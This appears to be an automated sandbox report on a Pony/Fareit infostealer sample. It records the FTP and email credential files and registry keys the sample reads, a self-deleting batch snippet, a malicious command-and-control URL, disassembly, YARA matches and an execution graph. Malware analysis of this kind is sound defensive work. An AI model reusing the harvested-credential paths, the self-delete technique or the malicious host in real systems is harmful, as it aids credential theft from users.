            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Windows\wcx_ftp.ini
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccs
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040E785 RegOpenKeyA, RegEnumKeyExA, RegCloseKey, PopPassword
            Source: C:\Users\user\Desktop\2qsdqACnX3.exe | Code function: 0_2_0040E785 RegOpenKeyA, RegEnumKeyExA, RegCloseKey, SmtpPassword
            Source: Yara match | File source: Process Memory Space: 2qsdqACnX3.exe PID: 6632, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match | File source: 2qsdqACnX3.exe, type: SAMPLE
            Source: Yara match | File source: 0.2.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0.0.2qsdqACnX3.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara match | File source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: 2qsdqACnX3.exe PID: 6632, type: MEMORYSTR
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | 1 Scripting | 1 Valid Accounts | 2 Native API | 1 Valid Accounts | 1 Valid Accounts | 1 Valid Accounts | 2 OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Email Collection | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Scripting | 11 Access Token Manipulation | 11 Access Token Manipulation | 2 Credentials in Registry | 1 Process Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 1 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 11 Process Injection | 11 Process Injection | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | 2 Data from Local System | Steganography | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | NTDS | 1 System Owner/User Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 3 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Install Root Certificate | Cached Domain Credentials | 14 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Source | Detection | Scanner | Label
            2qsdqACnX3.exe | 78% | Virustotal |
            2qsdqACnX3.exe | 95% | ReversingLabs | Win32.Infostealer.Pony
            2qsdqACnX3.exe | 100% | Avira | TR/PSW.Fareit.iloen
            2qsdqACnX3.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            Source | Detection | Scanner | Label
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
            https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
            https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
            http://gunnylaumienphi2017.com/ | 1% | Virustotal |
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 0% | Virustotal |
            http://gunnylaumienphi2017.com/YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 | 1% | Virustotal |
            No contacted domains info
            Name | Malicious | Antivirus Detection | Reputation
            http://gunnylaumienphi2017.com/ | true | | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            http://https://ftp://operawand.dat_Software | 2qsdqACnX3.exe | false | | unknown
            https://ac.ecosia.org/autocomplete?q= | 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://duckduckgo.com/chrome_newtab | 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://duckduckgo.com/ac/?q= | 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico | 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            ftp://http://https://ftp.fireFTPsites.datSeaMonkey | 2qsdqACnX3.exe | false | | unknown
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://www.ecosia.org/newtab/ | 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 2qsdqACnX3.exe, 00000000.00000003.2012707709.0000000000766000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            http://gunnylaumienphi2017.com/YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0 | 2qsdqACnX3.exe | false | | unknown
                No contacted IP infos
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1523193
                Start date and time:2024-10-01 09:26:08 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 1m 48s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:4
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:2qsdqACnX3.exe
                renamed because original name is a hash value
                Original Sample Name:73339cacdb37937c47ea7668ac3a1017.exe
                Detection:MAL
                Classification:mal100.troj.spyw.winEXE@5/1@0/0
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 81
                • Number of non-executed functions: 41
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Stop behavior analysis, all processes terminated
                • Exclude process from analysis (whitelisted): dllhost.exe
                • Not all processes where analyzed, report is missing behavior information
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                No simulations
                No context
                Process:C:\Users\user\Desktop\2qsdqACnX3.exe
                File Type:ASCII text, with CRLF, CR line terminators
                Category:dropped
                Size (bytes):94
                Entropy (8bit):3.233204299824007
                Encrypted:false
                SSDEEP:3:k4Zoa5/kFWJFFN6dAFZkMFlGl/AVFn:k/0/kFY/NDFZotwFn
                MD5:3880EEB1C736D853EB13B44898B718AB
                SHA1:4EEC9D50360CD815211E3C4E6BDD08271B6EC8E6
                SHA-256:936D9411D5226B7C5A150ECAF422987590A8870C8E095E1CAA072273041A86E7
                SHA-512:3EAA3DDDD7A11942E75ACD44208FBE3D3FF8F4006951CD970FB9AB748C160739409803450D28037E577443504707FC310C634E9DC54D0C25E8CFE6094F017C6B
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:......... :ktk ...... del . %1 ...if .. exist . %1 . goto .. ktk.. del . %0
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):6.198880234677548
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.56%
                • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                • Windows Screen Saver (13104/52) 0.13%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                File name:2qsdqACnX3.exe
                File size:83'968 bytes
                MD5:73339cacdb37937c47ea7668ac3a1017
                SHA1:b32d273a752ad25173e26a110ae05acbabf3f15d
                SHA256:d0abb0bd329f13afadfb0bbf6730f2233488b8c6c6f5e593d61d91b20fe8b772
                SHA512:6629b294d431b49f7d3272dc0bcaa85eaa2a82f0f3eceea27ff071ff4b7048af2b0a70bed658ad22e53b6d70d239399f477d5a2122d84bb6e28435678eefd41d
                SSDEEP:1536:YSSH/BiqTiTQROZFdQ6sPr2F7oW6fQrNZL3cncOaEzSkzmeL:ZS5MvXdfsPr2F7pyQhDOaEzKeL
                TLSH:0683F702F481F0F1C1A126B137C153B1E7F99E79783A4D5EEF4C89847DA628B7B16462
                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...............2.....N....................@..........................`.............................................
                Icon Hash:00928e8e8686b000
                Entrypoint:0x40ff8b
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                DLL Characteristics:
                Time Stamp:0x66F7AFAD [Sat Sep 28 07:26:37 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:4
                OS Version Minor:0
                File Version Major:4
                File Version Minor:0
                Subsystem Version Major:4
                Subsystem Version Minor:0
                Import Hash:8d644d676851d7b6f34d624a7462831f
                Instruction
                push ebp
                mov ebp, esp
                pop ebp
                push 0040FF99h
                clc
                jc 00007F0B25041B13h
                ret
                jmp far eax
                push esp
                add byte ptr [eax], al
                add byte ptr [ecx+0000000Ah], bh
                xor edx, edx
                div ecx
                cmp edx, 05h
                jne 00007F0B25041B14h
                jmp 00007F0B25041B14h
                jmp 00007F0B25041AFBh
                call 00007F0B25041A92h
                push 00000000h
                call 00007F0B25041C41h
                jmp dword ptr [00415020h]
                jmp dword ptr [00415024h]
                jmp dword ptr [00415028h]
                jmp dword ptr [0041502Ch]
                jmp dword ptr [00415030h]
                jmp dword ptr [00415034h]
                jmp dword ptr [00415038h]
                jmp dword ptr [0041503Ch]
                jmp dword ptr [00415040h]
                jmp dword ptr [00415044h]
                jmp dword ptr [00415048h]
                jmp dword ptr [0041504Ch]
                jmp dword ptr [00415050h]
                jmp dword ptr [00415054h]
                jmp dword ptr [00415058h]
                jmp dword ptr [0041505Ch]
                jmp dword ptr [00415060h]
                jmp dword ptr [00415064h]
                jmp dword ptr [00415068h]
                jmp dword ptr [0041506Ch]
                jmp dword ptr [00415070h]
                jmp dword ptr [00415074h]
                jmp dword ptr [00415078h]
                jmp dword ptr [0041507Ch]
                jmp dword ptr [00415080h]
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x14de4 | 0xb4 | .data
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                .text | 0x1000 | 0xfd2b | 0xfe00 | 88216a614d6c7f5dbcdad643224e119e | False | 0.45758489173228345 | data | 5.993619419981743 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                .data | 0x11000 | 0x4d58 | 0x4800 | 0d9987a474ebc4800e4e69b9ac14b2ec | False | 0.4222005208333333 | data | 5.272866548522773 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                DLL | Import
                KERNEL32.DLL: CreateFileA, ReadFile, CloseHandle, WriteFile, lstrlenA, GlobalLock, GlobalUnlock, LocalFree, LocalAlloc, GetTickCount, lstrcpyA, lstrcatA, GetFileAttributesA, ExpandEnvironmentStringsA, GetFileSize, CreateFileMappingA, MapViewOfFile, UnmapViewOfFile, LoadLibraryA, GetProcAddress, GetTempPathA, CreateDirectoryA, DeleteFileA, GetCurrentProcess, WideCharToMultiByte, GetLastError, lstrcmpA, CreateToolhelp32Snapshot, Process32First, OpenProcess, Process32Next, FindFirstFileA, lstrcmpiA, FindNextFileA, FindClose, GetModuleHandleA, GetVersionExA, GetLocaleInfoA, GetSystemInfo, GetWindowsDirectoryA, GetPrivateProfileStringA, SetCurrentDirectoryA, GetPrivateProfileSectionNamesA, GetPrivateProfileIntA, GetCurrentDirectoryA, lstrlenW, MultiByteToWideChar, Sleep, GetModuleFileNameA, LCMapStringA, ExitProcess, SetUnhandledExceptionFilter
                advapi32.dll: RegOpenKeyExA, RegQueryValueExA, RegCloseKey, RegOpenKeyA, RegEnumKeyExA, RegCreateKeyA, RegSetValueExA, IsTextUnicode, RegOpenCurrentUser, RegEnumValueA, GetUserNameA
                ole32.dll: CreateStreamOnHGlobal, GetHGlobalFromStream, CoCreateGuid, CoTaskMemFree, CoCreateInstance, OleInitialize
                shlwapi.dll: StrStrIA, StrRChrIA, StrToIntA, StrStrA, StrCmpNIA, StrStrIW
                user32.dll: wsprintfA
                userenv.dll: LoadUserProfileA, UnloadUserProfile
                wininet.dll: InternetCrackUrlA, InternetCreateUrlA
                wsock32.dll: inet_addr, gethostbyname, socket, connect, closesocket, send, select, recv, setsockopt, WSAStartup
                No network behavior found
                Target ID:0
                Start time:03:26:55
                Start date:01/10/2024
                Path:C:\Users\user\Desktop\2qsdqACnX3.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\2qsdqACnX3.exe"
                Imagebase:0x400000
                File size:83'968 bytes
                MD5 hash:73339CACDB37937C47EA7668AC3A1017
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, Author: unknown
                • Rule: pony, Description: Identify Pony, Source: 00000000.00000000.2008897794.0000000000411000.00000008.00000001.01000000.00000003.sdmp, Author: Brian Wallace @botnet_hunter
                • Rule: JoeSecurity_Pony, Description: Yara detected Pony, Source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Pony_d5516fe8, Description: unknown, Source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, Author: unknown
                • Rule: pony, Description: Identify Pony, Source: 00000000.00000002.2033191158.0000000000411000.00000004.00000001.01000000.00000003.sdmp, Author: Brian Wallace @botnet_hunter
                Reputation:low
                Has exited:true

                Target ID:2
                Start time:03:26:57
                Start date:01/10/2024
                Path:C:\Windows\SysWOW64\cmd.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\5990015.bat" "C:\Users\user\Desktop\2qsdqACnX3.exe" "
                Imagebase:0x790000
                File size:236'544 bytes
                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Target ID:3
                Start time:03:26:57
                Start date:01/10/2024
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff6d64d0000
                File size:862'208 bytes
                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true


                  Execution Graph

                  Execution Coverage:30.8%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:12.9%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:30
7877 40f3a0 7875->7877 7878 40f3c8 7876->7878 7879 40eeef 23 API calls 7877->7879 7880 40ef8e 26 API calls 7878->7880 7881 40f3b0 7879->7881 7882 40f3dd 7880->7882 7884 401752 LocalFree 7881->7884 7883 40ef8e 26 API calls 7882->7883 7885 40f3f2 7883->7885 7884->7874 7885->7566 7887 405b33 7886->7887 9597 405aa8 7887->9597 7890 405aa8 46 API calls 7891 405b5a 7890->7891 7891->7566 7894 40cfb4 7892->7894 7893 40d191 7893->7566 7894->7893 7895 40d01f CertOpenSystemStoreA 7894->7895 7895->7893 7899 40d039 7895->7899 7896 40d03b CertEnumCertificatesInStore 7897 40d04b CertCloseStore 7896->7897 7896->7899 7897->7893 7899->7896 7900 40d069 lstrcmp 7899->7900 7902 40d0a0 lstrcmp 7899->7902 7905 401752 LocalFree 7899->7905 9612 401769 LocalAlloc 7899->9612 7900->7899 7902->7899 7903 40d0b5 CryptAcquireCertificatePrivateKey 7902->7903 7903->7899 7904 40d0d2 CryptGetUserKey 7903->7904 7906 40d0e6 CryptExportKey 7904->7906 7907 40d15e CryptReleaseContext 7904->7907 7905->7899 7908 40d155 CryptDestroyKey 7906->7908 7909 40d0ff 7906->7909 7907->7899 7908->7907 9613 401769 LocalAlloc 7909->9613 7911 40d107 CryptExportKey 7913 40d124 7911->7913 7912 401752 LocalFree 7912->7908 7913->7912 7915 40beaf 7914->7915 7916 40bd1f 46 API calls 7915->7916 7917 40bebf 7916->7917 7917->7566 7919 404231 7918->7919 7920 404252 GetVersionExA 7919->7920 7921 404274 7920->7921 9614 404087 GetModuleHandleA 7921->9614 7923 4042ba 9620 401769 LocalAlloc 7923->9620 7925 4042cd GetLocaleInfoA 9621 40151c 7925->9621 7927 4042fc GetLocaleInfoA 7928 404325 7927->7928 9623 4040ef 7928->9623 7930 40432a 9631 404189 7930->9631 7945 40e0ab 7944->7945 7946 40bd1f 46 API calls 7945->7946 7947 40e0bb 7946->7947 7947->7566 7949 40be24 7948->7949 7950 40bd1f 46 API calls 7949->7950 7951 40be34 7950->7951 7952 401b46 6 API calls 7951->7952 7953 40be4b 7952->7953 7954 403dc3 41 API calls 7953->7954 7955 40be8e 7953->7955 7956 40be6c 7954->7956 7955->7566 7957 403dc3 41 API calls 7956->7957 7958 40be86 7957->7958 
7959 401752 LocalFree 7958->7959 7959->7955 7961 40eaa2 7960->7961 9687 40e785 RegOpenKeyA 7961->9687 7964 40e785 18 API calls 7965 40eaca 7964->7965 7965->7566 7971 40a69c 7966->7971 7967 40a6c2 9699 40a457 CoCreateInstance 7967->9699 7971->7967 7973 40a040 CoTaskMemFree 7971->7973 7972 40a6f7 7972->7566 7973->7967 7975 40521c 7974->7975 9747 4050e5 7975->9747 7978 4050e5 24 API calls 7979 40524f 7978->7979 7980 4050e5 24 API calls 7979->7980 7981 405267 7980->7981 7982 4050e5 24 API calls 7981->7982 7983 40527f 7982->7983 7984 4050e5 24 API calls 7983->7984 7985 405297 7984->7985 7986 4050e5 24 API calls 7985->7986 7987 4052af 7986->7987 7988 4050e5 24 API calls 7987->7988 7989 4052c7 7988->7989 7990 4050e5 24 API calls 7989->7990 7991 4052df 7990->7991 8015 40d81b 8014->8015 8016 403fb9 46 API calls 8015->8016 8017 40d835 8016->8017 8017->7566 8019 407d18 8018->8019 9794 407aee RegOpenKeyA 8019->9794 8022 407aee 14 API calls 8023 407d40 8022->8023 8023->7566 8032 40c418 8024->8032 8025 40c426 StrStrIA 8025->8032 8026 40c46d 8027 403fb9 46 API calls 8026->8027 8028 40c484 8027->8028 8030 401b46 6 API calls 8028->8030 8029 402200 9 API calls 8029->8032 8031 40c49b 8030->8031 8033 401b46 6 API calls 8031->8033 8032->8025 8032->8026 8032->8029 8034 403f6e 41 API calls 8032->8034 8036 401752 LocalFree 8032->8036 8035 40c4b5 8033->8035 8034->8032 8037 401b46 6 API calls 8035->8037 8036->8032 8038 40c4cf 8037->8038 8039 401b46 6 API calls 8038->8039 8042 40c4eb 8039->8042 8040 40c52e 8041 401752 LocalFree 8040->8041 8043 40c544 8041->8043 8042->8040 8046 401548 lstrlen 8042->8046 8044 401752 LocalFree 8043->8044 8045 40c54c 8044->8045 8047 401752 LocalFree 8045->8047 8049 40c518 8046->8049 8048 40c554 8047->8048 8051 401548 lstrlen 8049->8051 8053 40c523 8051->8053 8054 401548 lstrlen 8053->8054 8054->8040 8056 409c98 8055->8056 8057 401c86 7 API calls 8056->8057 8058 409ca2 8057->8058 8059 403f6e 41 API calls 8058->8059 8066 409cbf 8058->8066 8061 409cba 8059->8061 
8060 409cd0 StrStrIA 8060->8066 8063 401752 LocalFree 8061->8063 8062 409d15 8062->7566 8063->8066 8064 402200 9 API calls 8064->8066 8065 403f6e 41 API calls 8065->8066 8066->8060 8066->8062 8066->8064 8066->8065 8067 401752 LocalFree 8066->8067 8067->8066 8069 40d595 8068->8069 9805 40d547 8069->9805 8072 40d547 46 API calls 8073 40d5ac 8072->8073 8074 40d547 46 API calls 8073->8074 8075 40d5b6 8074->8075 8076 403fb9 46 API calls 8075->8076 8077 40d5cd 8076->8077 8077->7566 8079 407a14 8078->8079 9814 40779c RegOpenKeyA 8079->9814 8082 40779c 14 API calls 8083 407a3c 8082->8083 8083->7566 8085 408c13 8084->8085 9825 408bb5 8085->9825 8088 408bb5 46 API calls 8089 408c2a 8088->8089 8090 408bb5 46 API calls 8089->8090 8091 408c34 8090->8091 8091->7566 8093 40156d 8092->8093 8094 40f416 GetCurrentDirectoryA 8093->8094 8095 40981e 83 API calls 8094->8095 8096 40f451 8095->8096 8097 40981e 83 API calls 8096->8097 8098 40f46d SetCurrentDirectoryA GetCurrentDirectoryA 8097->8098 8099 40981e 83 API calls 8098->8099 8100 40f4b1 8099->8100 8101 40981e 83 API calls 8100->8101 8102 40f4cd SetCurrentDirectoryA 8101->8102 8103 40f4e4 8102->8103 8103->7566 8105 406912 8104->8105 9836 406738 RegOpenKeyA 8105->9836 8107 406922 8107->7566 8109 40bf11 8108->8109 8110 40bd1f 46 API calls 8109->8110 8111 40bf21 8110->8111 8111->7566 8113 409e10 8112->8113 8114 403fb9 46 API calls 8113->8114 8115 409e2a 8114->8115 8115->7566 8117 40cb8f 8116->8117 9846 40c8bc 8117->9846 8120 401c86 7 API calls 8122 40cba1 8120->8122 8121 40cbc3 8121->7566 8122->8121 8123 403dc3 41 API calls 8122->8123 8124 40cbbe 8123->8124 8125 401752 LocalFree 8124->8125 8125->8121 8127 40670f 8126->8127 8128 403fb9 46 API calls 8127->8128 8129 406729 8128->8129 8129->7566 8131 40da8f 8130->8131 9869 40d844 RegOpenKeyA 8131->9869 8134 40d844 14 API calls 8135 40dab7 8134->8135 8135->7566 8137 40e48f 8136->8137 8138 40e43f 46 API calls 8137->8138 8139 40e4a4 8138->8139 8139->7566 8141 40628d 8140->8141 9880 40601a 
RegOpenKeyA 8141->9880 8143 40629d 8143->7566 8145 40d38a 8144->8145 9891 40d1a2 RegOpenKeyA 8145->9891 8147 40d39a 8147->7566 8149 409c0a 8148->8149 8150 401b46 6 API calls 8149->8150 8151 409c24 8150->8151 8152 409c41 8151->8152 8153 403f6e 41 API calls 8151->8153 8154 401b46 6 API calls 8152->8154 8155 409c3c 8153->8155 8158 409c58 8154->8158 8156 401752 LocalFree 8155->8156 8156->8152 8157 409c75 8157->7566 8158->8157 8159 403f6e 41 API calls 8158->8159 8160 409c70 8159->8160 8161 401752 LocalFree 8160->8161 8161->8157 8163 40660a 8162->8163 8164 403fb9 46 API calls 8163->8164 8165 40662b 8164->8165 8166 401b46 6 API calls 8165->8166 8167 406642 8166->8167 8168 401c21 6 API calls 8167->8168 8169 40666a 8167->8169 8170 406651 8168->8170 8169->7566 8171 403f6e 41 API calls 8170->8171 8172 406665 8171->8172 8173 401752 LocalFree 8172->8173 8173->8169 8175 40ec87 8174->8175 8176 403fb9 46 API calls 8175->8176 8177 40eca1 8176->8177 8178 403fb9 46 API calls 8177->8178 8179 40ecb8 8178->8179 8180 403fb9 46 API calls 8179->8180 8181 40eccf 8180->8181 8182 403fb9 46 API calls 8181->8182 8183 40ece6 8182->8183 9902 40eb4e 8183->9902 8189 40ac06 8188->8189 9943 40aab9 RegOpenKeyA 8189->9943 8191 40ac16 8191->7566 8193 40156d 8192->8193 8194 409b86 GetCurrentDirectoryA 8193->8194 8195 40981e 83 API calls 8194->8195 8196 409bc1 8195->8196 8197 40981e 83 API calls 8196->8197 8198 409bdd SetCurrentDirectoryA 8197->8198 8199 409bf4 8198->8199 8199->7566 8201 404880 8200->8201 10031 401769 LocalAlloc 8201->10031 8203 40488d GetWindowsDirectoryA 8204 4048a1 8203->8204 8205 4048b5 8203->8205 8204->8205 8206 4048a8 8204->8206 8207 401752 LocalFree 8205->8207 10032 40473b 8206->10032 8209 4048b3 8207->8209 8210 401c86 7 API calls 8209->8210 8211 4048c4 8210->8211 8212 40473b 28 API calls 8211->8212 8213 4048cd 8212->8213 8214 401c86 7 API calls 8213->8214 8215 4048d4 8214->8215 8216 4048ec 8215->8216 8217 401c21 6 API calls 8215->8217 8218 401c86 7 API calls 8216->8218 8219 4048e3 
